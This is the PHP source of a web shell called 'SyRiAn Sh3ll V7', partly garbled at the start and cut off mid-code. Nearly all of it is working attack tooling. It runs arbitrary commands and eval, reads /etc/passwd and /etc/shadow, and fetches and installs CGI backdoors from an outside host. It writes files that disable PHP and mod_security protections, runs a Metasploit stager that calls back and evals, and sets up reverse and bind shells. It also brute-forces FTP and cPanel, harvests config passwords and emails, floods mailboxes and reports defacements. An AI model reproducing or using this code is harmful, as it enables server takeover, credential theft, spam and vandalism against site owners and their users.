SyRiAn Sh3ll ~ V7~ [ B3 Cr34T!V3 Or D!3 TRy!nG ]

'; exit; } } } # ---------------------------------------# # Some Info # #----------------------------------------# $dir = getcwd(); $uname= @php_uname(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); $server = @substr($SERVER_SOFTWARE,0,120); echo "

SyRiAn Sh3ll
V7

[Main] [Forum Defacer] [Email Spammer] [About] [Logout] [SuiCide]

Safe Mode = ".@SafeMode()." System = ".$os." Magic_Quotes = ". @magicQouts()." Curl = ".@Curl()." Register Globals = ".@RegisterGlobals()." Open Basedir = ".@openBaseDir()."
Gzip = ".@Gzip()." MySQLI = ".@MysqlI()." MSQL = ".@MSQL()." SQL Lite = ".@SQlLite()." Usefull Locals = ".rootxpL()."
Free Space = ".@HardSize(disk_free_space('/'))." Total Space = ".@HardSize(disk_total_space("/"))." PHP Version = ".@phpversion()." Zend Version = ".@zend_version()." MySQL Version = ".@mysql_get_server_info()."
MySQL = ".MySQL2()." MsSQL = ".MsSQL()." PostgreSQL = ".PostgreSQL()." Oracle = ".Oracle()." Server Name = ".$_SERVER['HTTP_HOST']." Server Admin = ".$_SERVER['SERVER_ADMIN']."
Dis_Functions = ". DisableFunctions()."
Your IP = ".GetRealIP()." Server IP = ".gethostbyname($_SERVER["HTTP_HOST"])." [Reverse IP] Date Time = ".date('Y-m-d H:i:s')."
[MD5 Cracker] [SHA1 Cracker] [NTLM Cracker]

  Server :
uname -a :
pwd :
ID :

  ".$server."
  ".$uname." [Google]
  ". $dir."
  ".Exe('id')."

  [Down] [Print]

"; # ---------------------------------------# # Main Page # #----------------------------------------# if ($_GET['id']== 'mainPage') { echo "

"); for($i=0;$i'.htmlspecialchars(mysql_field_name($result,$i)).' '); echo("\n\n"); for($i=0;$i'); for($j=0;$j'.(htmlspecialchars($rows[$j])).''); } echo("\n"); } echo("

if(!$_POST || $_POST['login']) // Show Current Directory Contents if No Post in requesting ... 
	{
		@chdir($_POST['directory']);
		if($os == "Windows")
		{
			echo Exe('dir');
		}
		else if($os == "Linux")
		{
			echo Exe('ls');
		}
	}
	else if($_POST['submitCommands']) // Execute The Alias Command .
		{
			echo Exe($_POST['alias']);
		}
	else if($_POST['Execute']) // Execute The Command From Command Line  .
		{
			@chdir($_POST['directory']);
			if(empty($_POST['cmd']))
			{
				if($os == "Windows")
				{
					echo Exe('dir');
				}
				else if($os == "Linux")
				{
					echo Exe('ls -lia');
				}
			}
			else
			{
				echo Exe($_POST['cmd']);
			}
		}
		else if($_POST['submitEval']) // Execute Eval Code .
		{
			$eval = @str_replace("<?php","",$_POST['php_eval']);
			$eval = @str_replace("<?php","",$eval);
			$eval = @str_replace("?>","",$eval);
			$eval = @str_replace("\\","",$eval);
			echo eval($eval);
		}
		# --------------------------
		#   Hash Analyzer        
		#---------------------------
		else if($_POST['analyzieNow'])
		{
			$hash = $_POST['hashToAnalyze'];
			$subHash = substr($hash,0,3);
			if($subHash =='$ap' && strlen($hash) == 37)
			{
				echo "The Hash : ".$hash." is : MD5(APR) Hash";
			}
			else if($subHash =='$1$' && strlen($hash) == 34)
			{
				echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
			}
			else if($subHash =='$H$' && strlen($hash) == 35)
			{
				echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
			}
			else if(strlen($hash) == 29)
			{
				echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
			}
			else if($subHash =='$5$' && strlen($hash) == 64)
			{
				echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
			}
			else if($subHash =='$6$' && strlen($hash) == 128)
			{
				echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
			}
			else if(strlen($hash) == 56)
			{
				echo "The Hash : ".$hash." is : SHA224 Hash";
				}
			else if(strlen($hash) == 64)
			{
				echo "The Hash : ".$hash." is : SHA256 Hash";
				}
			else if(strlen($hash) == 96)
			{
				echo "The Hash : ".$hash." is : SHA384 Hash";
			}
			else if(strlen($hash) == 128)
			{
				echo "The Hash : ".$hash." is : SHA512 Hash";
			}
			else if(strlen($hash) == 40)
			{
				echo "The Hash : ".$hash." is : MySQL v5.x Hash";
			}
			else if(strlen($hash) == 16)
			{
				echo "The Hash : ".$hash." is : MySQL Hash";
			}
			else if(strlen($hash) == 13)
			{
				echo "The Hash : ".$hash." is : DES(Unix) Hash";
			}
			else if(strlen($hash) == 32)
			{
				echo "The Hash : ".$hash." is : MD5 Hash";
			}
			else if(strlen($hash) == 4)
			{
				echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
			else 
			{
				echo "Error : Can't Detect Hash Type";
			}
		}
		# --------------------------
		#  Show Users    
		#---------------------------
		else if($_POST['showUsers'])
		{
			function showUsers()
			{

if($rows = Exe('cat /etc/passwd'))
				{
					echo $rows;
				}
				elseif($rows= Exe('cat /etc/domainalias'))
				{
					echo $rows;
				}
				elseif($rows= Exe('cat /etc/shadow')) 
				{
					echo $rows;
				}
				elseif($rows= Exe('cat /var/mail')) 
				{
					echo $rows;
				}
				elseif($rows= Exe('cat /etc/valiases')) 
				{
					echo $rows;
				}
				else { echo "[-] Can't Show Users :( ... Sorry ";}
			}
			showUsers();
		}
		# --------------------------
		#   Generate perl      
		#---------------------------
		else if($_POST['generatePel'])
		{
			@chdir($_POST["cgiperlPath"]);
			@mkdir("cgi", 0755);
			@chdir("cgi");
			Exe('wget http://www.syrian-shell.com/cgiPerl/cgiPerl.sy3.zip');
			Exe('unzip cgiPerl.sy3.zip');
			@unlink('cgiPerl.sy3.zip');
			@chmod("cgiPerl.sy3",0755);
			@chmod("compiler",0777);
			$cgi_h = fopen('.htaccess','w+');
			@fwrite($cgi_h,'AddHandler cgi-script .sy3');
			echo '
cgi.sy3 & .htaccess Has Been Created in [ cgi ]  Directory 
Password Is : sy34' ;
		}
		# --------------------------
		#   Generate Server   
		#---------------------------
		else if($_POST['generateSER'])
		{
			@chdir($_POST['ShourtCutPath']);
			@mkdir("allserver", 0755);
			@chdir("allserver");
			Exe("ln -s / allserver");
			GenerateFile(".htaccess","
			Options Indexes FollowSymLinks
			DirectoryIndex ssssss.htm
			AddType txt .php
			AddHandler txt .php");
			echo 'Now Go to allserver folder '.$_POST['ShourtCutPath'].'' ;
		}
		# --------------------------
		#   Change Mode 
		#---------------------------
		else if($_POST['changePermission'])
		{
			$ch_ok = @chmod($_POST['fileName'],$_POST['per']);
			if($ch_ok)
			echo "Permission Changed Successfully ! " ;
			else echo "Changing Is Not Allowed Or The File is not Exist !";
		}
		# --------------------------
		#   Generate Users
		#---------------------------
		else if($_POST['GenerateUsers'])
		{
			@chdir($_POST['usersPath']);
			@mkdir("users", 0755);
			@chdir('users');
			Exe('wget http://www.syrian-shell.com/usersAndDomains/users.rar');
			Exe('mv users.rar users.sy3');
			@chmod('users.sy3',0755 );
			$user_h = fopen('.htaccess','w+');
			fwrite($user_h,'AddHandler cgi-script .sy3');
			echo "users.sy3 & .htaccess Has Been Created in [ users ]  Directory" ;
		}
		# --------------------------
		#   Forbidden
		#---------------------------
		else if($_POST['generateForbidden'])
		{
			@chdir($_POST['forbiddenPath']);
			@mkdir('forbidden');
			@chdir('forbidden');
			$htaccess = fopen('.htaccess','w+');
			if($_POST['403'] == 'DirectoryIndex')
			{
				fwrite($htaccess,"DirectoryIndex in.txt");
			}
			elseif($_POST['403'] == 'HeaderName')
			{
				fwrite($htaccess,"HeaderName in.txt");
			}
			elseif($_POST['403'] == 'TXT')
			{
				fwrite($htaccess,"
				Options Indexes FollowSymLinks 
				addType txt .php 
				AddHandler txt .php");
			}
			elseif($_POST['403'] == '404')
			{
				fwrite($htaccess,"
				ErrorDocument 404 /404.html 
				404.html = Symlinked in.txt  ");
			}
			elseif($_POST['403'] == 'ReadmeName')
			{
				fwrite($htaccess,"ReadmeName in.txt");
			}
			elseif($_POST['403'] == 'footerName')
			{
				fwrite($htaccess,"footerName in.txt");
			}
			echo "
Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
EX : ln -s /home/user/public_html/config.php in.txt";
		}
		# --------------------------
		#   Upload Files
		#---------------------------
		else if($_POST['UploadNow'])
		{
			$nbr_uploaded =0;
			$files_uploded = array();
			$path= '';
			$target_path= $path . basename($_FILES['uploadfile']['name'][$i]);
			for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++)
			{
				if($_FILES['uploadfile']['name'][$i] != '')
				{
					move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $target_path . $_FILES['uploadfile']['name'][$i]);
					$files_uploded[] = $_FILES['uploadfile']['name'][$i];
					$nbr_uploaded++;
					echo "The File  ".basename($_FILES['uploadfile']['name'][$i])." Uploaded Successfully !
";
				}
				else "The File  ".basename($_FILES['uploadfile']['name'][$i])."  Can't Be Upload :( !";
			}
		}
		# --------------------------
		#   no Security
		#---------------------------
		else if($_POST['phpiniGenerate'])
		{
			GenerateFile("php.ini","
			safe_mode = Off
			disable_functions = NONE
			safe_mode_gid = OFF
			open_basedir = OFF");
			echo "php.ini Has Been Generated Successfully";
		}
		else if($_POST['htaccessGenerate'])
		{
			GenerateFile(".htaccess","
			<IfModule mod_security.c>
			SecFilterEngine Off
			SecFilterScanPOST Off
			SecFilterCheckURLEncoding Off
			SecFilterCheckCookieFormat Off
			SecFilterCheckUnicodeEncoding Off
			SecFilterNormalizeCookies Off
			</IfModule>
			SetEnv PHPRC ".getcwd()."php.ini
			suPHP_ConfigPath ".getcwd()."php.ini
			");
			echo ".htaccess Has Been Generated Successfully ";
		}
		else if($_POST['iniphpGenerate'])
		{
			GenerateFile("ini.php","
			ini_restore(\"safe_mode\");
			ini_restore(\"open_basedir\");
			");
			echo "ini.php Has Been Generated Successfully";
		}
		# --------------------------
		#  Reading Files
		#---------------------------
		else if($_POST['read'] || $_POST['show'])
		{
			$file = $_POST['file'];
			$file = str_replace('\\\\','\\',$file);
			
				if($_POST['read'])
				{
					$openMyFile = fopen($file,'r');
					if(function_exists('fread'))
					{
						echo fread($openMyFile,100000);	
					}
					elseif(function_exists('fgets'))
					{
						echo fgets($openMyFile);
					}
					elseif(function_exists('readfile'))
					{
						echo readfile($openMyFile);
					}
					elseif(function_exists('file_get_contents'))
					{
						$readMyFile = @file_get_contents($file, NULL, NULL, 0, 1000000);
						var_dump($readMyFile);
					}
					elseif(function_exists('file'))
					{
						$readMyFile = file($myFile); 
						foreach ($readMyFile as $line_num => $readMyFileLine) 
						{ 
							echo "Line #$line_num : " . $readMyFileLine . "
							"; 
						}
					}
					elseif(Exe("'cat ".$file."'"))
					{
						echo Exe("'cat ".$file."'");	
					}
				elseif(function_exists('readfile'))
				{
					readfile($file);
				}
				elseif(function_exists('include'))
				{
					include($file);	
				}
				elseif(function_exists('copy'))
				{
					$tmp=tempnam('','cx');
					copy('compress.zlib://'.$file,$tmp);
					$fh=fopen($tmp,'r');
					$data=fread($fh,filesize($tmp));
					fclose($fh);
					echo $data;
				}
				elseif(function_exists('mb_send_mail'))
				{
					if(file_exists('/tmp/mb_send_mail'))
					{
						unlink('/tmp/mb_send_mail');
					}
					@mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
					@readfile('/tmp/mb_send_mail');
				}
				else if(function_exists('curl_init'))
				{
					$fh=curl_init('file://'.$file.'');
					$tmp=curl_exec($fh);
					echo $tmp;
					if(strstr($file,DIRECTORY_SEPARATOR))
					$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
					else $ch=curl_init('file://'.$file."\x00".__FILE__);
					var_dump(curl_exec($ch));
				}
				else if(is_writable('.'))
				{
					file_put_contents('php.ini','safe_mode = Off');
					readfile($file);
					unlink('php.ini');
				}
				else if(is_object($ws=new COM('WScript.Shell')))
				{
					echo $exec=comshelL("type \"$file\"",$ws);
				}
				else if(checkfunctioN('win_shell_execute'))
				{
					echo winshelL("type \"$file\"");
				}
				else if(checkfunctioN('win32_create_service'))
				{
					echo srvshelL("type \"$file\"");
				}
				else if(function_exists('imap_open'))
				{
					$str=imap_open('/etc/passwd','','');
					$list=imap_list($str,$file,'*');
					for($i=0;$i<count($list);$i++)
					{
						echo $list[$i]."\n";
					}
					imap_close($str);
					$str=imap_open($file,'','');
					$tmp=imap_body($str,1);
					echo $tmp;
					imap_close($str);
				}
				elseif($file == '/etc/passwd')
				{
					for($uid=0;$uid<99999;$uid++)
					{
						$h=posix_getpwuid($uid);
						if(!empty($h))
						foreach($h as $v)
						echo "$v:";
						echo "\r\n";
					}
				}
				fclose($openMyFile);
			}
			elseif($_POST['show'])
			{
				$con=glob("$file*");
				foreach ($con as $v)
				{
					echo "$v\n";
				}
				if(function_exists('imap_open'))
				{
					$str=imap_open('/etc/passwd','','');
					$s=explode("|",$file);
					if(count($s)>1)
					{
						$list=imap_list($str,trim($s[0]),trim($s[1]));
					}
					else 
					{
						$list=imap_list($str,trim($str[0]),'*');
					}
					for($i=0;$i<count($list);$i++)
					{
						imap_close($str);
					}
				}
				else if(is_object($ws=new COM('WScript.Shell')))
				{
					$exec=comshelL("dir \"$file\"",$ws);
					$exec=str_replace("\t",'',$exec);
					echo $exec;
				}
				else if(checkfunctioN('win_shell_execute'))
				{
					echo winshelL("dir \"$file\"");
				}
				else if(checkfunctioN('win32_create_service'))
				{
					echo srvshelL("dir \"$file\"");
				}
			}
			
		}
		# --------------------------
		#   Encryption
		#---------------------------
		elseif($_POST['encryptNow'])
		{
			if(!empty($_POST['ENCRYPTION']))
			{
				$md5 = $_POST['ENCRYPTION'];
				echo "
MD5 			: ".md5($md5)."
Base64 Encode   	: ".base64_encode($md5)."
Base64 Decode   	: ".base64_decode($md5)."
Crypt 			: ".crypt($md5)."
SHA1 			: ".sha1($md5)."
MD4 			: ".hash("md4",$md5)."
SHA256 			: ".hash("sha256",$md5)."
URL Encoding 		: ".urlencode($md5)."
URL Decoding 		: ".str_hex($md5)."
CRC32 			: ".crc32($md5)."
Length 			: ".strlen($md5)."";
			}
			else
			{
				echo "Please Put At Least One Char !";
			}
		}
		# --------------------------
		#   Metasploit RC
		#---------------------------
		else if($_POST['metaConnect'])
		{
			$ip = $_POST['ip'];
			$port = $_POST['port'];
			if ($ip == "" && $port == "")
			{
				echo "Please fill IP Adress & The listen Port";
			} 
			else 
			{
				$ipaddr = $ip; 
				$port = $port;
				if (FALSE !== strpos($ipaddr, ":")) 
				{
					$ipaddr = "[". $ipaddr ."]";
				}
				if (is_callable('stream_socket_client')) 
				{
					$msgsock = @stream_socket_client("tcp://{$ipaddr}:{$port}");
					if (!$msgsock)
					{
						die(); 
					}
					$msgsock_type = 'stream';
				} 
				elseif (is_callable('fsockopen')) 
				{
					$msgsock = fsockopen($ipaddr,$port);
					if (!$msgsock) 
					{
						die(); 
					}
					$msgsock_type = 'stream';
				}
				elseif (is_callable('socket_create')) 
				{
					$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
					$res = socket_connect($msgsock, $ipaddr, $port);
					if (!$res) 
					{
						die(); 
					}
					$msgsock_type = 'socket';
				} 
				else 
				{
					die();
				}
				switch ($msgsock_type) 
				{ 
					case 'stream': $len = fread($msgsock, 4); break;
					case 'socket': $len = socket_read($msgsock, 4); break;
				}
				if (!$len) 
				{
					die();
				}
				$a = unpack("Nlen", $len);
				$len = $a['len'];
				$buffer = '';
				while (strlen($buffer) < $len) 
				{
					switch ($msgsock_type) 
					{ 
						case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); 
						break;
						case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));
						break;
					}
				}
				eval($buffer);
				echo "[*] Connection Terminated";
				die();
			}
		}
		# --------------------------
		#  Scan Ports
		#---------------------------
		else if($_POST['submitDomainToScanPort'])
		{
			$domainToScan = $_POST['domainToScanPort'];
			if(!$domainToScan)
			{
				echo "[-] Enter IP Address Or Domain To Scan";
			}
			else 
			{
				for($i=0;$i<1024;$i++) 
				{
					$fp = @fsockopen($domainToScan,$i,$errno,$errstr,10);
					if($fp)
					{
						echo "[+] port " . $i . " open on " . $domainToScan . "
";
					}
					else
					{
						echo "[+] port " . $i . " closed on " . $domainToScan . "
";
					}
					flush();
				} 
				fclose($fp);
			}
		}
			
			if (isset($_POST["submit_lol"])) 
			{
				set_time_limit(0);
				$url = $_POST['hash_lol'];
				echo "Testing ".$url."\n";
				$extention = $_POST['extention'];
				$adminlocales = array(
"admin/",
"wp-admin/",
"administration/",
"administrator/",
"moderator/",
"webadmin/",
"adminarea/",
"bb-admin/",
"adminLogin/",
"admin_area/",
"panel-administracion/",
"instadmin/",
"memberadmin/",
"administratorlogin/",
"adm/",
"siteadmin/login".$extention."",
"admin/account".$extention."",
"admin/index".$extention."",
"admin/login".$extention."",
"admin/admin".$extention."",
"admin_area/login".$extention."",
"admin_area/index".$extention."",
"admincp/index".$extention."",
"adminpanel".$extention."",
"webadmin".$extention."",
"webadmin/index".$extention."",
"webadmin/login".$extention."",
"admin/admin_login".$extention."",
"admin_login".$extention."",
"panel-administracion/login".$extention."",
"admin_area/admin".$extention."",
"bb-admin/index".$extention."",
"bb-admin/login".$extention."",
"bb-admin/admin".$extention."",
"admin/home".$extention."",
"pages/admin/admin-login".$extention."",
"admin/admin-login".$extention."",
"admin-login".$extention."",
"admin/adminLogin".$extention."",
"home".$extention."",
"adminarea/index".$extention."",
"admin/controlpanel".$extention."",
"admin".$extention."",
"admin/cp".$extention."",
"cp".$extention."",
"adminpanel.php",
"moderator".$extention."",
"administrator/index".$extention."",
"administrator/login".$extention."",
"user".$extention."",
"administrator/account".$extention."",
"administrator".$extention."",
"login".$extention."",
"modelsearch/login".$extention."",
"moderator/login".$extention."",
"panel-administracion/admin".$extention."",
"admincontrol/login".$extention."",
"adm/index".$extention."",
"moderator/admin".$extention."",
"account".$extention."",
"controlpanel".$extention."",
"admincontrol".$extention."",
"webadmin/admin".$extention."",
"adminLogin".$extention."",
"panel-administracion/login".$extention."",
"wp-login".$extention."",
"adminLogin".$extention."",
"admin/adminLogin".$extention."",
"adminarea/index".$extention."",
"adminarea/admin".$extention."",
"adminarea/login".$extention."",
"panel-administracion/index".$extention."",
"modelsearch/index".$extention."",
"modelsearch/admin".$extention."",
"adm/admloginuser".$extention."",
"admloginuser".$extention."",
"admin2".$extention."",
"admin2/login".$extention."",
"admin2/index".$extention."",
"adm/index".$extention."",
"adm".$extention."",
"affiliate".$extention."",
"adm_auth".$extention."",
"memberadmin".$extention."",
"administratorlogin".$extention."");
				foreach ($adminlocales as $admin)
				{
					$headers = @get_headers("$url$admin");
					if (@eregi('200', $headers[0])) 
					{
						echo "[+] $url$admin  ~ Found!\n";
					}
					
				}
			}
		# --------------------------
		#   Config Finder
		#---------------------------
		else if($_POST['configFinderSubmit'])
		{
			set_time_limit(0); 
			$passwd=fopen('/etc/passwd','r'); 
			if (!$passwd)
			{ 
				echo "[-] Error : coudn't read /etc/passwd"; 
				exit; 
			} 
			$path_to_public=array(); 
			$users=array(); 
			$pathtoconf=array(); 
			$i=0; 
			while(!feof($passwd)) 
			{ 
				$str=fgets($passwd); 
				if ($i>35) 
				{ 
				   $pos=strpos($str,":"); 
				   $username=substr($str,0,$pos); 
				   $dirz="/home/$username/public_html/"; 
				   if (($username!="")) 
				   { 
					   if (is_readable($dirz)) 
					   { 
						   array_push($users,$username); 
						   array_push($path_to_public,$dirz); 
					   } 
				   } 
				} 
				$i++; 
			} 
			echo ""; 
			echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
		"; 
			echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
		"; 
			echo "[~] Searching for passwords in config.* files...
		"; 
			foreach ($users as $user) 
			{ 
				   $path="/home/$user/public_html/"; 
				   read_dir($path,$user); 
			} 
			echo "[+] Done"; 
		}
		# --------------------------
		#   Mail Storm
		#---------------------------
		else if($_POST['sendMailStorm'])
		{
			$to=$_POST['to'];
			$nom=$_POST['nom'];
			$Comments=$_POST['Comments'];
			if ($to <> "" )
			{
				for ($i = 0; $i < $nom ; $i++)
				{
					$from = rand (71,1020000000)."@"."Attacker.com";
					$subject= md5("$from");
					if(@mail($to,$subject,$Comments,"From:$from"))
					echo "[+] $i spammed !!
";
					else 
					{
						echo "[-] $i Failed !! 
";
					}
				}
			}
		}
		# --------------------------
		#   Extract Emails				
		#---------------------------
		else if($_POST['getEmails'])
		{
			$emhost = $_POST['EM_HOST'];
			$emuser = $_POST['EM_USER'];
			$empass = $_POST['EM_PASS'];
			$emdb = $_POST['EM_DB'];
			$emtab = $_POST['EM_TABLE'];
			$emcol = $_POST['EM_COLUMN'];
			$try2Connect = @mysql_connect($emhost,$emuser,$empass);
			if(!$try2Connect) 
			{
				echo "[-] Can't Connect To DB !! [ user name || password is wrong ! ] .
";
			}
			$try2Select = @mysql_select_db($emdb);
			if(!$try2Select && $try2Connect) 
			{
				echo "[-] DB Name is Wrong !! . ";
			}
			$sql = @mysql_query("SELECT * FROM $emtab");
			while ($res = @mysql_fetch_array($sql))
			{
				echo ''.$res["$emcol"].'
';
			}
		}
		// Help 
		else if($_POST['emailExtractorHelp'])
		{
			echo "This is Some Tables Name & Columns Name For Some Fam Scripts ..

[+] VBulletin
Table-name : user
column-name : email

[+] WordPress 
Table-name : wp_users
column-name : user_email

[+] Joomla 
Table-name : jos_users
column-name : email

[+] PHPBB 
Table-name : phpbb_users
column-name : user_email

[+] I.P.Board 
Table-name : ibf_members
column-name : email

[+] SMF 
Table-name : smf_members
column-name : emailAddress ";
		}
		# --------------------------
		#   MySQL Query
		#---------------------------
		else if($_POST['MySQLQuery'])
		{
			$qu_host =$_POST['QU_HOST'];
			$qu_user =$_POST['QU_USER'];
			$qu_pass =$_POST['QU_PASS'];
			$qu_db =$_POST['QU_DB'];
			$query =$_POST['QU'];
			if (empty($_POST['QU_HOST']))
			$qu_host = 'localhost';
			$query = str_replace("\\","",$query);
			if (!empty($_POST['QU']))
			{
				$tryConnection = @mysql_connect($qu_host,$qu_user,$qu_pass);
				if(!$tryConnection)
				{
					echo "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!";
				}
				else
				{
					$selectDB = @mysql_select_db($qu_db);
					if(!$selectDB)
					{
						echo "[-] Database Name Is Wrong !!";
					}
					else
					{
						$qqok1 = mysql_query($query);
						if(!$qqok1)
						{
							echo "[-] Can't Execute The Query";
						}
					}
				}
				@mysql_close();
			}
			if ($qqok1)
			{
				update(); 
			}
		}
			# --------------------------
			#   SQL Reader
			#---------------------------
			else if ($_POST['sql2Read'])
			{
				$host = $_POST['host'];
				$user = $_POST['user'];
				$pass = $_POST['pass'];
				$db = $_POST['db'];
				$unique = uniqid('N');
				$file = $_POST['file'];
				$file = str_replace('\\\\','\\',$file);
				$query = array(
				"CREATE TEMPORARY TABLE $unique (file LONGBLOB)",
				"LOAD DATA INFILE '".mysql_real_escape_string($file)."' INTO TABLE $unique",
				"SELECT * FROM $unique"
				);
				$connect = mysql_connect($host,$user, $pass);
				mysql_select_db($db,$connect);
				foreach($query as $Allqueries)
				{
					$mysqlQuery = mysql_query($Allqueries,$connect);
					while($line = @mysql_fetch_row($mysqlQuery))
					echo htmlspecialchars($line[0]);
					echo "\n";
				}
			}
			# --------------------------
			#   Edit File
			#---------------------------
			else if($_POST['editFileSubmit'])
			{
				$file2Edit = $_POST['editFile'];
				echo @file_get_contents($file2Edit);
			}
			else if($_POST['saveEditedFile'])
			{
				$fileName = $_POST['file2edit'];
				$newFile = $_POST['ExecutionArea'];
				$trytoGenerate = GenerateFile($fileName,$newFile);
				if($trytoGenerate)
				{
					echo "[+] File Saved !";
				}
				else 
				{
					echo "[-] Failed To Save File !!";	
				}
			}
			# --------------------------
			#   Zone H Attacker
			#---------------------------
			else if($_POST['SendNowToZoneH'])
			{
				ob_start();
				$sub = @get_loaded_extensions();
				if(!in_array("curl", $sub))
				{
					die('[-] Curl Is Not Supported !! ');
				}
			
				$hacker = $_POST['defacer'];
				$method = $_POST['hackmode'];
				$neden = $_POST['reason'];
				$site = $_POST['domain'];
				
				if (empty($hacker))
				{
					die ("[-] You Must Fill the Attacker name !");
				}
				elseif($method == "--------SELECT--------") 
				{
					die("[-] You Must Select The Method !");
				}
				elseif($neden == "--------SELECT--------") 
				{
					die("[-] You Must Select The Reason");
				}
				elseif(empty($site)) 
				{
					die("[-] You Must Inter the Sites List ! ");
				}
				$i = 0;
				$sites = explode("\n", $site);
				while($i < count($sites)) 
				{
					if(substr($sites[$i], 0, 4) != "http") 
					{
						$sites[$i] = "http://".$sites[$i];
					}
					ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
					echo "Site : ".$sites[$i]." Defaced !\n";
					++$i;
				}
				echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
			}
			# --------------------------
			#   FTP And Cpanle Brute Force Attacker
			#---------------------------
			else if($_POST['BruteForceCpanelAndFTP'])
			{
				$connect_timeout=5;
				set_time_limit(0);
				$submit=$_REQUEST['BruteForceCpanelAndFTP'];
				$users=$_REQUEST['users'];
				$pass=$_REQUEST['passwords'];
				$target=$_REQUEST['target'];
				$cracktype=$_REQUEST['cracktype'];
				
				if(empty($target))
				{
					$target = "localhost";
				}
				
				function ftp_check($host,$user,$pass,$timeout)
				{
					$ch = curl_init();
					curl_setopt($ch, CURLOPT_URL, "ftp://$host");
					curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
					curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
					curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
					curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
					curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
					curl_setopt($ch, CURLOPT_FAILONERROR, 1);
					$data = curl_exec($ch);
					if ( curl_errno($ch) == 28 ) 
					{
						 print "Error : Connection Timeout Please Check The Target Hostname .";
						 exit;
					}
					elseif ( curl_errno($ch) == 0 )
					{
						print "[+] Cracking Success With Username ($user) and Password ($pass)";
					}
					curl_close($ch);
				}
				function cpanel_check($host,$user,$pass,$timeout)
				{
					$ch = curl_init();
					curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
					curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
					curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
					curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
					curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
					curl_setopt($ch, CURLOPT_FAILONERROR, 1);
					$data = curl_exec($ch);
					if ( curl_errno($ch) == 28 ) 
					{ 
						print "[-] Connection Timeout Please Check The Target Hostname .";
						exit;
					}
					elseif ( curl_errno($ch) == 0 )
					{
						print "[+] Cracking Success With Username ($user) and Password ($pass)";
					}
					curl_close($ch);
				}
				if(isset($submit) && !empty($submit))
				{
					if(empty($users) && empty($pass))
					{ 
						print "[-] Please Check The Users or Password List Entry . . .";
					}
					if(empty($users))
					{ 
						print "[-] Please Check The Users List Entry . . ."; 
					}
					if(empty($pass))
					{ 
						print "[-] Please Check The Password List Entry . . ";
					}
					$userlist=explode("\n",$users);
					$passlist=explode("\n",$pass);
					print "[~]# Cracking Process Started, Please Wait ...";
					foreach ($userlist as $user) 
					{
						$pureuser = trim($user);
						foreach ($passlist as $password ) 
						{
							$purepass = trim($password);
							if($cracktype == "ftp")
							{
								ftp_check($target,$pureuser,$purepass,$connect_timeout);
							}
							if ($cracktype == "cpanel")
							{
								cpanel_check($target,$pureuser,$purepass,$connect_timeout);
							}
						}
					}
				}
			}
			# --------------------------
			#   Back Connection
			#---------------------------
			else if($_POST['backconn'])
			{
				if (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
				{ 
					$ip = trim($_POST['ip']); 
					$port = trim($_POST['backport']); 
					tulis("bcc.c",$back_connect_c); 
					Exe('gcc -o bcc bcc.c'); 
					Exe('chmod 777 bcc'); 
					@unlink('bcc.c'); 
					Exe("./bcc ".$ip." ".$port." &"); 
					$msg = "Now script try connect to ".$ip." port ".$port." ..."; 
				} 
				elseif (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) 
				{ 
					$ip = trim($_POST['ip']);
					$port = trim($_POST['backport']);
					tulis("bcp",$back_connect);
					Exe("chmod +x bcp"); 
					$p2=which("perl");
					Exe($p2." bcp ".$ip." ".$port." &");
					$msg = "Now script try connect to ".$ip." port ".$port." ..."; 
				} 
			}
			# --------------------------
			#   Bind Connection
			#---------------------------
			else if($_POST['bind'])
			{
				if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) 
				{ 
					$port = trim($_POST['port']); 
					$passwrd = trim($_POST['bind_pass']); 
					tulis("bdc.c",$port_bind_bd_c); 
					Exe('gcc -o bdc bdc.c'); 
					Exe('chmod 777 bdc'); 
					@unlink("bdc.c"); 
					Exe("./bdc ".$port." ".$passwrd." &"); 
					$scan = Exe("ps aux"); 
					if(eregi("./bdc $por",$scan))
					{ 
						$msg = "Process found running, backdoor setup successfully."; 
					} 
					else 
					{ 
						$msg = "Process not found running, backdoor not setup successfully."; 
					} 
				} 
				
				elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) 
				{ 
					$port = trim($_POST['port']); 
					$passwrd = trim($_POST['bind_pass']); 
					tulis("bdp",$port_bind_bd_pl); 
					Exe("chmod 777 bdp"); 
					$p2=which("perl"); 
					Exe($p2." bdp ".$port." &"); 
					$scan = Exe("ps aux"); 
					if(eregi("$p2 bdp $port",$scan))
					{ 
						$msg = "Process found running, backdoor setup successfully."; 
					} 	
					else 
